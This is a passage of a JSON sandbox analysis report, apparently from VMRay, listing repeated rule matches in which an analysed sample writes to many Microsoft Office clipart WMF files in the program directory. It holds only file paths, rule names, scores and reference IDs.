office\\clipart\\pub60cor\\j0240291.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38045", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240291.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241019.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241019.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38052", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241019.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241037.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241037.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38059", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241037.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241041.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241041.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38066", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241041.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241043.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241043.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38073", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241043.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241077.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241077.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38080", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241077.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241773.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241773.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38087", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241773.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0241781.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241781.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38094", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0241781.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250504.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250504.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38101", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250504.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0250997.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250997.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38110", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0250997.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0251007.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0251007.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38119", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0251007.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252629.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0252629.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38134", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0252629.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0252669.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0252669.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38141", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0252669.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0278702.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0278702.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38148", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0278702.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0279644.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0279644.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38155", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0279644.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0280468.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0280468.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38164", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0280468.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281008.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281008.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38179", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281008.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281243.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281243.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38190", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281243.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281630.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281630.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38201", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281630.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281632.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281632.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38208", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281632.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281638.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281638.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38215", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281638.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281640.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281640.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38222", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281640.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282126.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282126.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38229", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282126.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282928.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38236", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282928.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282932.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282932.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38247", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282932.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285462.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285462.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38254", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285462.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285484.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285484.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38261", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285484.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285780.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285780.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38268", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285780.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285782.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285782.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38277", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285782.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285792.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285792.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38286", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285792.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285796.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285796.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38293", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285796.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285808.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285808.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38300", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285808.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285820.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285820.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38307", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285820.wmf\".", 